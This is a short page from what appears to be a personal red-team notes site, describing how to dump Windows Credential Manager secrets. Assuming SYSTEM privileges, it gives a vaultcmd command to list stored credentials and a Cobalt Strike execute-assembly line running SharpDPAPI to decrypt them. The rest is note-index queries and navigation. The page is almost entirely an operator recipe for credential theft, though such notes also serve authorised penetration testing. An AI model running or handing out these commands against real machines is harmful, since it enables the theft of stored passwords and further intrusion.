Dumping Windows Credential Manager

Dump Windows Credential Manager with Cobalt Strike and SharpDPAPI

Prerequisites

Debug Privileges Obtained (ex: NT_AUTHORITY/SYSTEM)

Instructions

Check for presence of credentials: run vaultcmd /listcreds:"Windows Credentials" /all

execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /rpc

Related Notes

All Related Notes

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows") OR contains(tags, "looting")
SORT file.ctime DESC

windows

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows")
SORT file.ctime DESC

looting

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "looting")
SORT file.ctime DESC

📓 Jorkle's Notes

Explorer

Dump Windows Credential Manager

Dumping Windows Credential Manager

Graph View

Table of Contents

Backlinks